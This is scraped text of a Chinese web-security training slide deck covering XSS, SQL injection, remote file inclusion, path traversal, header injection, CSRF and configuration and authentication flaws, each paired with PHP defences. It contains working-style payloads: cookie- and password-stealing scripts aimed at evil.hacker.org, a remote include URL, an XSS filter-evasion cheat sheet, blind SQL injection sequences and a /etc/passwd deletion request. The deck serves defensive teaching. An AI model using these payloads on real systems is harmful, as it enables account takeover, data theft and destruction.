狠狠撸

狠狠撸Share a Scribd company logo

奥别产安全解决方案痴1.0

X
xuanliang
1 of 127
Penetration test Software developer Security analyst Security consultation Whatever
跨站攻击 注入攻击 远程文件执行 CSRF 攻击 访问控制缺陷 配置错误 数据存储不安全 直接对象参考不安全 认证和会话管理不完善 通信不安全
入侵技术交流 防御 XSS
?
1. 攻击者向服务器插入恶意代码 2. 数据库存储恶意代码 姚明… 3. 互联网用户点击主题 4. 数据传送给互联网用户 5. 浏览器执行恶意代码 Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… 郑智… 郭晶晶… 中国队 ..... 攻击者、弱点网站、互联网用户的 互动游戏 Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国队 ..... cookies Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国队 ..... phishing username/password Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国队 ..... spoofed Server Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶 中国队 ..... botnet Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
<?php print 'welcome '.$_GET['name']; ?> http://example/welcome.php?name=Wong_Bin <HTML> <Body> Welcome Wong_Bin </Body> </HTML>
<?php print 'welcome '.$_GET['name']; ?> http://example/welcome.php?name=<script>alert(&quot;XSS&quot;)</script> <HTML> <Body> Welcome <script>alert(&quot;XSS&quot;)</script> </Body> </HTML>
<Font size=5> Update your email address</ font> <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http://example/update.php&quot;> <input type=&quot;text&quot; name=&quot;search&quot; size=60> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </ form> <?php ... $email = $_GET['email']; $query = &quot;update user set email='$email' where name='wong'&quot;; $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print “Success update...\n&quot;; } ?> <?php ... $query = select email from user where name = 'wong' $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_result ($db_query, 0); if ($db_resutl) { echo &quot;<p>EMAIL Address:$ db_resutl <p>&quot;; } ?> <HTML> EMAIL Address: huangbin@nsfocus.com </HTML> [email_address] Update your email address 确定
<Font size=5> Update your email address</ font> <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http://example/update.php&quot;> <input type=&quot;text&quot; name=&quot;search&quot; size=60> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </ form> <?php ... $email = $_GET['email']; $query = &quot;update user set email='$email' where name='wong'&quot;; $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print “Success update...\n&quot;; } ?> <?php ... $query = select email from user where name = 'wong' $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_result ($db_query, 0); if ($db_resutl) { echo &quot;<p>EMAIL Address:$ db_resutl <p>&quot;; } ?> <HTML> EMAIL Address: huangbin@nsfocus.com </HTML> huangbin@nsfocus.com<script>document.location ='http://evil.hacker.org/steal_cookies.php?cookies=‘%20+encodeURI(document.cookie);</script> http://evil.hacker.org. Steal Cookes!!! Update your email address 确定
姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> <HTML> 欢迎来到奥运论坛! 用户名: 密 码: </HTML> 刘翔… ..... 郑智… ..... 郭晶晶 ..... 中国队 ..... User_information.txt 记录用户名和密码 奥运论坛 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241 输入用户名、密码。登陆……
… <body background=javascript:evil=document.createElement(&quot;script&quot;);evil.src=/slideshow/webv10/460315/&quot;http:/evil.hack.org/xss.js&quot;;document.body.appendChild(evil);> … <SCRIPT language=JavaScript> function Phishing() { evil_code = Make a Phishing Page by … document.write(evil_code); } Phishing() </SCRIPT> ... <form>action=&quot;user_infomation.php&quot; method=&quot;post&quot; onsubmit=&quot;evilImg=new Image; evil.src='http://evil.hacker.org/'+document.forms(1).login.value'+':'+ document.forms(1).password.value;&quot;</form> ... <?php if (isset($_POST['username']) && isset($_POST['password'])) { $filename = &quot;/www/user_information.txt&quot;; $file = @fopen($file_path, &quot;a&quot;); $info = &quot;user: &quot;.$_POST['username'].&quot; passwd:&quot;.$_POST['password'].&quot;\n&quot;; @fwrite($file, $info); @fclose($file); } ?> Phish Attacker Client 请重新登陆 用户: 密码: 确定 取消
<INPUT TYPE=&quot;image&quot; SRC=/slideshow/webv10/460315/&quot;http:/example&quot;><script>alert(& <INPUT TYPE=&quot;image&quot; SRC=&quot;http://example&quot;> ? Normally ? Evil
? Danger replace(str,&quot;<&quot;,&quot;&lt;&quot;) replace(str,&quot;>&quot;,&quot;&gt;&quot;) ‘ <script.*>’ ? Weak
<INPUT TYPE=&quot;image&quot; SRC=javascript:alert(&quot;xss&quot;) > ? Evil Dim re ????Set re=new RegExp ????re.IgnoreCase =True ????re.Global=True re.Pattern=/slideshow/webv10/460315/&quot;javascript:&quot; ????Str = re.replace(Str,/slideshow/webv10/460315/&quot;javascript : &quot;) ????re.Pattern=&quot;jscript:&quot; ?? Str = re.replace(Str,&quot;jscript : &quot;) ????re.Pattern=&quot;vbscript:&quot; ?? Str = re.replace(Str,&quot;vbscript : &quot;) set re=nothing ? N ot so good ? Danger javascript:
<INPUT TYPE=&quot;image&quot; SRC=/slideshow/webv10/460315/javascript& ? Evil ? Danger ‘ & ’ replace(str,&quot;&&quot;,&quot;&amp;&quot;) ? Weak
<img src=/slideshow/webv10/460315/&quot;javas cript:alert('xss')&quot;> ? Evil ? Danger replace(str,“ ”,“&nbsp; “) ? Weak
http://example/weak.php?username=%3A%69%6E%70%75%74%21%74%79%70%65%3D%68%69%64%64%65%6E%20%76%61%6C%75%65%3D%47%6F%74%63%68%61%21%20%6E%61%6D%66%20%3D%20%78%3E%20%3C%73%63%71%69%71%74%3E%20%61%6C%65%72%71%28%78%2C%76%61%6C%75%65%29%27%3C%2F%73%63%72%69%70%74%3E%4A%69%6C http://example/weak.php?username=<input type=hidden value=v name = x> <script>alert(x.value)</script>Wrong ? Evillooking
function safe_html($msg) { $msg = str_replace('&amp;','&',$msg); $msg = str_replace('&nbsp;',' ',$msg); $msg = str_replace('&quot;','&quot;',$msg); $msg = str_replace(&quot;'&quot;,'&#39;',$msg); $msg = str_replace(&quot;<&quot;,&quot;&lt;&quot;,$msg); $msg = str_replace(&quot;>&quot;,&quot;&gt;&quot;,$msg); $msg = str_replace(&quot;\t&quot;,&quot; &nbsp; &nbsp;&quot;,$msg); $msg = str_replace(&quot;\r&quot;,&quot;&quot;,$msg); $msg = str_replace(&quot; &quot;,&quot; &nbsp; &quot;,$msg); return $msg; } Danger input Encoding input
<img src=/slideshow/webv10/460315/&quot; onerror=alert(/xss/)> ? Evil <img src=/slideshow/webv10/460315/&quot; style=“evil:expression(alert(/xss/));&quot;> <img src=/slideshow/webv10/460315/&quot;/**/onerror=alert(/xss/) > ? Evil ? Evil
HTML 表单 WEB 程序 数据库 WEB 程序 浏览器 ? ? ? ?
HTML 表单 WEB 程序 数据库 WEB 程序 浏览器 ? replace(str, safer, danger) …… …… 事前 Htmlspecialchars ($html, ENT_QUOTES) …… 事中 FireFox no script …… …… 事后
? Danger ? Danger
POST / thepage.jsp?var1=page1.html HTTP/1.1 Accept: */* Referer: http:// www.myweb.com/index.html Accept-Language: en-us,de;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-url-encoded Content-Lenght: 59 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www. myweb.com Connection: Keep-Alive uid=fred&password=secret&pagestyle=default.css&action=login Danger
‘ <script.*>’ <table background=javascript:evil()> <tr background=javascript:evil()> <body background=javascript:evil()>
<input type='image' src=javascript:evil()> <img src='javascript:evil()’> <frameset> <frame src=/slideshow/webv10/460315/&quot;javascript:danger()&quot;>...
<link rel=&quot;stylesheet” href=javascript:evil()> <base href=javascript:evil()>
<meta http-equiv=&quot;refresh“ content=&quot;0;url=javascript:danger()&quot;> <p style='background-image: url(/slideshow/webv10/460315/&quot;javascript:danger();&quot;)'); <a href='javascript:danger();'>
<body onload='danger();'> <div onmouseover='danger();'> <div onscroll='danger();'>
<div onmouseenter='danger();'>
<object type=&quot;text/x-scriptlet“ data=&quot;evil.com/danger.js&quot;> <style>@import evil.com/danger.js</style> <div style=&quot;width:expression(danger();)&quot;>
[IE] <div style=&quot;behaviour: url( /slideshow/webv10/460315/[link to code] );&quot;> [Mozilla] <div style=&quot;binding: url( /slideshow/webv10/460315/[link to code] );&quot;> [IE] <div style=&quot;width: expression( [code] );&quot;> [N4] <style type= &quot;text/javascript&quot;>[code] </style> [IE] <object classid=&quot;clsid:...&quot; codebase=/slideshow/webv10/460315/&quot;javascript:[code]&quot; > <style><!--</style> <script>[code]//--></script> <![CDATA[<!--]]> <script>[code]//--></script> <!-- -- --> <script>[code]</script> <!-- -- --> < <script>[code]</script> <img src=/slideshow/webv10/460315/&quot;blah&quot;onmouseover=&quot; [code] &quot;> <img src=&quot;blah>&quot; onmouseover=&quot; [code] &quot;> <xml src=&quot; javascript:[code] &quot;> <xml d=&quot;X&quot;><a><b> &lt;script>[code]&lt;/script> ; </b></a> </xml> <div datafld=&quot;b&quot; dataformatas=&quot;html&quot; datasrc=&quot; #X &quot;></div> [UTF-8; IE, Opera] [\xC0][\xBC]script>[code][\xC0][\xBC]/script> <a href=&quot; javas&#99;ript&#35;[code] &quot;> <div onmouseover=&quot; [code] &quot;> <img src=&quot; javascript:[code] &quot;> [IE] <img dynsrc=&quot; javascript:[code] &quot;> [IE] <input type=&quot;image&quot; dynsrc=&quot; javascript:[code] &quot;> [IE] <bgsound src=&quot; javascript:[code] &quot;> & <script>[code]</script> [N4] &{ [code] }; [N4] <img src=&{ [code] };> <link rel=&quot;stylesheet&quot; href=&quot; javascript:[code] &quot;> [IE] <iframe src=&quot; vbscript:[code] &quot;> [ N4] <img src=&quot; mocha:[code] &quot;> [N4] <img src=&quot; livescript:[code] &quot;> < a href=&quot;about: <s&#99;ript>[code]</script> &quot;> <meta http-equiv=&quot;refresh&quot; content=&quot;0;url= javascript:[code] &quot;> <body onload=&quot; [code] &quot;> <div style=&quot;background-image: url( javascript:[code] );&quot;>
Htmlspecialchars() Htmlspecialchars() Strip_tags() $str = strip_tags($_POST['message'], '<b><p><i><u>'); $str = htmlentities($str); echo nl2br($str);
<?php $html = '<p><i><s>Welcome to Nsfocus!</i></p></s>'; print strip_tags($html); print ‘\n’; // Allow <p><i><s> print strip_tags($html, '<p><i><s>'); ?> <?php $html = '<script>alert(&quot;xss attack!!&quot;)</script>'; print strip_tags($html); print &quot;\n&quot;; // Allow <script> print strip_tags($html, '<script>'); ?> Welcome to Nsfocus! alert(&quot;xss attack!!&quot;)
<?php $html = &quot;<a href='http://example'>evil link</a>&quot;; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt; print $html.&quot;\n\r&quot;; print $new_html; ?> <?php $html = '<script>alert(&quot;xss attack!!&quot;)</script>'; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt; print $new_html.&quot;\n\r&quot;; print $html; ?> evil link alert(&quot;xss attack!!&quot;) <a href='test'>Test</a>
<?php $html = &quot;<a href='http://example'>evil link</a>&quot;; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt; print $html.&quot;\n\r&quot;; print $new_html; ?> <?php $html = '<script>alert(&quot;xss attack!!&quot;)</script>'; $new_html = htmlentities($html, ENT_QUOTES,’UTF-8’); // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt; print $new_html.&quot;\n\r&quot;; print $html; ?> evil link alert(&quot;xss attack!!&quot;) <a href='test'>Test</a>
$_FILES['message'] $_GET['message'] $_REQUEST['message'] $_POST['message'] $HTTP_GET_VARS['message'] More… $_COOKIE['message'] $_ENV['message'] $_SESSION['message'] $_SERVER['message']
?
入侵技术交流 防御 SQL Injection
?
... <form action = &quot;login.php&quot; method = &quot;post&quot; name = &quot;login&quot;> 用户 :<input type = &quot;text&quot; name = &quot;username&quot; value = &quot;&quot; maxlength = &quot;20&quot;> 密码 :<input type = &quot;password&quot; name = “password&quot; value = &quot;&quot; maxlength = &quot;20&quot;> <INPUT TYPE=submit name = &quot;confirm&quot; value = &quot; 确定 &quot;> <INPUT TYPE=reset name = &quot;cancel&quot; value = &quot; 取消 &quot;> </form> ... <?php $query= &quot;select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ ”; $db_query = mysql_db_query($dbname, $query); $db_resutl = mysql_fetch_array($db_query); if ($db_resutl) { print &quot;Success in...\n&quot;; } ?> ? select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ ? 用户: 密码: 确定 取消
select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ admin select * from user where username=‘admin’ and password=‘’ or ‘’=‘’ Success in… ‘ or’’=‘ 用户: 密码: 确定 取消
select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ ‘ ;Delete from users;/* select * from user where username=‘‘;Delete from users;/*… Success in… ? Worse 用户: 密码: 确定 取消
<Font size=5>Search page</font> <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http://example/Search.php&quot;> <input type=&quot;text&quot; name=&quot;name&quot; size=60> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </form> <?php $search_name = $_GET['search_name']; $ query = &quot;select * from user where username like ‘ %$search_name% ’ order by id desc&quot;; $db_query = mysql_db_query($dbname,$ query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print &quot;Search result...\n&quot;; } ?> ? select * from user where username like ‘ %$search_name %‘ order by id desc ? Search page: 确定
select * from user where username like ‘%$search_name%‘ order by id desc select * from user where username like ‘%%‘ order by id #%’order by id desc All username show… %' order by id# Search page: 确定
<Font size=5>Update your password</font> <form name=&quot;update&quot; method=&quot;post&quot; action=&quot;http://example/update.php&quot;> <input type=&quot;text&quot; name=&quot;password&quot; size=20> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </form> <?php $passwd = $_GET[‘password ‘]; $query = “update user set passwd='$passwd' where uid='$uid'&quot;; $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print “Success in update...\n&quot;; } ?> ? update user set passwd='$passwd' where uid='$uid' ? Update your password: 确定
update user set passwd='$passwd' where uid='$uid' update user set passwd=‘123’ where uid =‘1’/*where uid =‘252’ Uid1 password chang Update your password: 123’ where uid = ‘1’/* 确定
Get /query.php?name=Wong ' Get /query.php?name=Wong’ and LEFT(password,1)=‘i Web Server … MYSQL SERVER 将 varchar 值“ luyq@#11” 转换时发生语法错误。 /show/query.php ,第 87 行 Password 是 luyq@#11 Attacker FALSE FALSE
Attacker Web Server Post /attacktarget?errors=Y&debug=5 Show more … Get /query.php?user=joe’ Error message: $debug = 1 …
show_source() highlight_string() highlight_file() Other Show error message function… ? Take care error_reporting() Php.ini ------- display_errors = off ? Better
1. 判断注入点 MSSQL SERVER!! Get /query.asp?name=Wong ' Get /query.asp?name=Wong and 1=1 Get /query.asp?name=Wong and 1=2 Web Server Attacker FALSE TRUE FALSE
Get /query.asp?name= Wong and (select count(*) from admin)>=0 Get /query.asp?name= Wong and (select count(user) from admin)>=0 Get /query.asp?name= Wong and (select count(username) from admin)>=0 … 1. 判断注入点 2. 探测数据库结构 MYSQLSERVER!! 表名 admin 字段 username.. Attacker Web Server TRUE FALSE TRUE
Get /query.asp?name= Wong and (select top 1 len(username) from admin)>5 Get /query.asp?name= Wong and (select top 1 len(username) from admin)<10 Get /query.asp?name= Wong and (select top 1 len(username) from admin)=8 … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名长 5 位,密码长 8 位 3. 探测用户名和密码长度 Attacker Web Server TRUE TRUE TRUE
Get /query.asp?name= Wong and 1= (select count(*) from admin where id=1 and mid(uaername,1,1)='a') Get /query.asp?name= Wong and 1= (select count(*) from admin where id=1 and mid(uaername,2,1)=‘r') … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名长 5 位,密码长 8 位 3. 探测用户名和密码长度 用户名: admin 密码 : jjyy@!&1 4. 探测用户名和密码 Attacker Web Server TRUE FALSE
1. 判断注入点 MYSQL SERVER!! Get /query.php?name=joe’ Get /query.php?name=joe’ and 1=1 Get /query.php?name=joe’ and 1=2 Web Server Attacker FALSE TRUE FALSE
Get /query.php?name= joe’ and LENGTH(password)>‘5 Get /query.php?name= joe’ and LENGTH(password)<‘15 Get /query.php?name= joe’ and LENGTH(password) =‘13 … 1. 判断注入点 2. 探测密码长度 MYSQLSERVER!! 密码长 13 位 Attacker Web Server TRUE TRUE TRUE
Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= joe’ and LEFT(password,2)=‘f … 1. 判断注入点 2. 探测密码长度 MYSQL SERVER!! 密码长 13 位 密码是 ilovepassword 3. 探测密码 Attacker Web Server FALSE TRUE FALSE
Get /query.php?name= joe’ union select 1,1,1,1,1 from root_user/* Get /query.php?name= admin’ union select 1,1,1,1,1 from admin_user/* … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 密码长 12 位 密码是 ilovepassword 3. 探测用户名和密码长度 猜测到存放管理员信息的 admin_user 表 4. 探测其它表 Attacker Web Server FALSE TRUE
Get /query.php?name= joe’and 1<>1 union select 1,1,name,1,1,passwd,1 from admin_user /* 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 密码长 12 位 密码是 ilovepassword 3. 探测用户名和密码长度 猜测到存放管理员信息的 admin_user 表 4. 探测其它表 用户名: admin 密码 : fly_you ! @# 5. 拿到用户名和密码 Attacker Web Server TRUE
Get /query.php?name= -1’ union select 1,1,1,1,load_file('c:/boot.ini') C lient Web Server C:\boot.ini
合法 数据长度检测 数据类型检测 数据字符检测 合法 合法 否 合法 出错提示 否 否
客户端检查、过滤 合法 错误提示 错误提示 服务器响应 服务端检查、过滤 合法 处理提交信息 攻击备案 输入 输入 绕过客户端检查 否 是 是 否 客户端 服务端
< > & ‘ “ + ; {Whitespace} % / \ # Danger !
addslashes mysql_real_escape_strin PDO escapeshellarg escapeshellcmd magic_quotes_gpc register_globals safe_mode allow_url_fopen open_basedir disable_functions 注:解决方案少了,需要更多的时间去完成… …
入侵技术交流 防御 恶意文件执行
?
Web Server Attacker Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin. ...
<?php include($_GET['file'].&quot;.php&quot;); ?> <?php print file_get_contents('/etc/passwd'); ?> Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt
<?php include($_GET['file'].&quot;.php&quot;); ?> Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt <?php var_dump(get_defined_vars()); die(); ?>
<?php include($_GET['file'].&quot;.php&quot;); ?> Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt <?php print &quot;Guess user & password demo\n&quot;; include('http://evil.hacker.org/userGuesses.php'); foreach($userGuesses as $user => $password) { $connection = @mysql_connect('localhost', $user, $password); if ($connection) { print &quot;Success with username: $user. Using password: $password\n&quot;; } } ?>
? Right allow_url_fopen allow_url_include($file) ? Advise <?php include($_GET['file'].&quot;.php&quot;); ?> <?php $page = array( 'contact' => 'contact.php', 'help' => 'help.php', 'query' => 'query.php'); if (array_key_exists($_GET['file'], $page)) { include('/full/path/'.$page[$_GET['file']]); } ?> ? Wrong
Attacker Web Server Get /del.php?user=../etc&file=passwd Del /etc/passwd success Post file=passwd Success Post…
<?php // 从用户目录中删除指定的文件 $username = $_GET['user']; $homedir = &quot;/home/$username&quot;; $file_to_delete = &quot;$userfile&quot;; unlink (&quot;$homedir/$userfile&quot;); echo &quot;$file_to_delete has been deleted!&quot;; ?> <?php // 删除硬盘中任何 PHP 有访问权限的文件 $ file_to_delete = $_GET[‘file’]; $username = &quot;../etc/&quot;; $homedir = &quot;/home/../etc/&quot;; $file_to_delete = &quot;passwd&quot;; unlink (&quot;/home/../etc/passwd&quot;); echo &quot;/home/../etc/passwd has been deleted!&quot;; ?> Get /del.php?user=../etc&file=passwd
? Right ? Better <?php $username = $_SERVER['REMOTE_USER']; // 使用认证机制 $homedir = &quot;/home/$username&quot;; $file_to_delete = basename(&quot;$userfile&quot;); // 去除变量中的路径 unlink ($homedir/$file_to_delete); $fp = fopen(&quot;/home/logging/filedelete.log&quot;,&quot;+a&quot;); // 记录删除动作 $logstring = &quot;$username $homedir $file_to_delete&quot;; fwrite ($fp, $logstring); fclose($fp); echo &quot;$file_to_delete has been deleted!&quot;; ?> <?php $username = $_SERVER['REMOTE_USER']; // 使用认证机制 $homedir = &quot;/home/$username&quot;; if (!ereg('^[^./][^/]*$', $userfile)) die('bad filename'); // 停止执行代码 if (!ereg('^[^./][^/]*$', $username)) die('bad username'); // 停止执行代码 ?>
? And 只给 PHP 的 web 用户很有限的权限!
<?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; mail($to, $subject, $message, $from ); ?> To: [email_address] Subject: the subject From: [email_address] POST [email_address]
<?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; mail($to, $subject, $message, $from ); ?> To: [email_address] Subject: the subject From: [email_address] Bcc: [email_address] Reply-To: [email_address] … POST fake@example.org\r\nBcc:evil@example.com\r\nReply-To:evil2@example.com
<?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; if (! ctype_print ($headers)) { print &quot;Error post\n&quot;; } else mail($to, $subject, $message, $from ); ?> ? Right <?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; if (! ctype_print ($headers)) { write_logs(IP MESSAGE); print “U IP has been log…\n&quot;; } else mail($to, $subject, $message, $from ); ?> ? Better
入侵技术交流 防御 CSRF
?
1. 攻击者向服务器插入恶意代码 2. 数据库存储恶意代码 姚明… 3. 互联网用户访问网站 4. 互联网用户点击主题 5. 浏览器执行恶意代码 Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… 郑智… 郭晶晶… 中国队 ..... 192.168.1.10 6. 执行危险的操作 cookies 信任域 Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241 login Webpage+cookies evil
Attacker Myspace Post <div style=“background:url()”> Cool ! Post <script.*> 、 onclick, 、 <a href=javascript://> … False Post <divstyle=“background:url(/slideshow/webv10/460315/‘javascript:evil()’)”> False Post <divstyle=“background:url(/slideshow/webv10/460315/‘java script:evil()’)”> False Post <divstyle=“background:url(/slideshow/webv10/460315/‘java&)’)”> Cool!!!Hello,web worm!
入侵技术交流 防御 配置错误
Web Server Attacker Get /config/horde.php.bak ... $conf['prefs']['driver'] = 'sql'; $conf['prefs']['params'] = array(); $conf['prefs']['params']['phptype'] = 'mysql'; $conf['prefs']['params']['hostspec'] = 'foo.bar'; $conf['prefs']['params']['username'] = 'root'; $conf['prefs']['params']['password'] = 'blabla'; $conf['prefs']['params']['database'] = 'horde'; $conf['prefs']['params']['table'] = 'horde_prefs'; ...
? Wrong
? Right
php.ini register_globals: Off allow_url_fopen: Off magic_quotes_gpc: Off magic_quotes_runtime: Off safe_mode: On open_basedir: On displays_errors = off log_errors = on error_log = /var/log/php.log register_globals = off session.use_trans_sid = 0 open_basedir = /servers/www/foo.bar/ expose_php = off Must
入侵技术交流 防御 身份认证漏洞
Attacker Web Server Post wrong username or passwd 用户名或密码错误 Get /login.php 用户: 密码: 确定 取消 Get /script.php?authorized=1 Success login in…
<?php if (authenticated_user()) { $authorized = true; } if ($authorized) { include '/highly/sensitive/data.php'; } ... ?> <?php $_SESSION['authenticated'] = false; if (authenticate_user()) { $_SESSION['authenticated'] = true; } if (!$_SESSION['authenticated']) { die(&quot;Authorization required&quot;); } ... ?> ? Wrong ? Right
? Better ? Advise <?php $_SESSION['authenticated'] = false; if (authenticate_user()) { $_SESSION['authenticated'] = true; } if (!$_SESSION['authenticated']) { mail(&quot;admin@example.com&quot;, &quot;Possible breakin attempt&quot;, $_SERVER['REMOTE_ADDR']); echo &quot;Security violation, Admin has been alerted.&quot;; exit; } ... ?> register_globals = off error_reporting(E_ALL); ? And
<?php if (!isset($_SESSION['session_id'])) { $_SESSION['session_id'] = 1; } else { $_SESSION['session_id']++; } print “we can guest it\n” ?> ? W rong ? Right <?php Session_start(); if (!isset($_SESSION['session_id'])) { $_SESSION['session_id'] = 1; } else { session_regenerate_id (); } print “we can guest it\n” ?>
入侵技术交流 防御 存储缺陷
Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(password,1,1)='a') Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(password,2,1)=‘r') … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名和密码长度 3. 探测用户名和密码长度 密码是 admin@#$%! 4. 探测密码 Attacker Web Server TRUE FALSE
Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(uaername,1,1)=‘1') Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(uaername,2,1)=‘r') … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名和密码长度 3. 探测用户名和密码长度 HASH 值 120a1b2649c88aef29edd2ffd7359d73 4. 探测密码 Attacker Web Server TRUE FALSE
Web Server Attacker Get /config/database.mdb Database.mdb Username | password Admin admin@#$%! …
Web Server Attacker Get /config/database.mdb Database.mdb Username | password Admin 120a1b2649c88aef29edd2ffd7359d73 …
admin@#$%! 0x120a1b2649c88aef29edd2ffd7359d73 ? W rong ? Right
<?php // 存储密码散列 $query = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); // 发送请求来验证用户密码 $query = sprintf(&quot;SELECT 1 FROM users WHERE name='%s' AND pwd='%s';&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); if (pg_num_rows($result) =< 0) { echo 'Authentication failed for $username.'; } ?> ? Rigth
md5(uniqid(rand(), true)) B etter than md5(uniqid(rand()) ? C ookie
Php.ini session.save_path ? S ession
攻击技术交流 防御 HTTP 数据传输
Post Forum Message: 用户名 : aa 密 码 : aa_passwd C lient Web Server 登陆成功,欢迎 aa…
Attacker 登陆成功,欢迎 aa… 登陆论坛 用户名 : aa 密 码 : aa_passwd C lient Web Server 登陆成功,欢迎 aa… 登陆论坛 用户名 : aa 密 码 : aa_passwd
Attacker qfw2k3vkei5vinev C lient Web Server faj2fk42iio 9fj1kjfajffj fkajlkfiefi2hffkfkff WAP 登陆论坛 用户名 : aa 密 码 : aa_passwd 登陆成功,欢迎 aa…
Post Forum Message: 用户名 : aa 密 码 : aa_passwd C lient Web Server 登陆成功,欢迎 aa…
C lient Web Server Client Arp 病毒 登陆论坛 用户名 : aa 密 码 : aa_passwd <script> evil code </script> 登陆论坛 用户名 : aa 密 码 : aa_passwd
Evil Attacked! C lient Web Server 登陆成功,欢迎 aa… <script>evil code</script> 登陆成功,欢迎 aa… Client Arp 病毒
入侵技术交流 防御 访问控制缺陷
Get /afalkjfla/admin123.php C lient Web Server 登陆管理界面成功,欢迎 admin 回家…
Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= joe’ and LEFT(password,2)=‘f … 1. 判断注入点 2. 探测密码长度 MYSQL SERVER!! 密码长 13 位 密码是 ilovepassword 3. 探测密码 Attacker Web Server FALSE TRUE FALSE
